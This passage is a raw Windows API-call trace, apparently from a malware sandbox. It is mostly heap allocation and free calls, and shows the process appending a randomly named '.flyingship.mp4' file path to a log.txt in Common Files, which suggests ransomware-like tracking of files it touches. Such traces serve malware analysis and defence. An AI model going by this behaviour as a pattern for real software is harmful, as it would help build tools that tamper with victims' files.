0x76e618 [0075.396] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x699838 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.397] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.397] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.397] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x170) returned 0x6a0b20 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x699838 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0c98 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0c98 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.398] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.398] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0075.399] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.399] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.399] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.399] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.399] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.399] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.399] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.399] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.399] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.400] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x142, lpOverlapped=0x0) returned 1 [0075.400] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.400] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x142, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.400] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.400] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.400] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.400] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.400] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0075.401] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5e) returned 0x75b7b8 [0075.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\n", cchWideChar=94, lpMultiByteStr=0x75b7b8, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 94 [0075.401] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.401] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b820 [0075.401] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.401] WriteFile (in: hFile=0x128, lpBuffer=0x75b820*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x75b820*, lpNumberOfBytesWritten=0x61eef4*=0x5d, lpOverlapped=0x0) returned 1 [0075.401] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b820 | out: hHeap=0x650000) returned 1 [0075.401] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.401] CloseHandle (hObject=0x128) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.402] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.402] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.402] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69bce0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.403] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.404] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.404] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.404] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.404] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.404] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.404] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.404] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.404] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.404] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76af28 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.404] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.404] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.405] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.405] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.406] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.406] HeapFree (in: 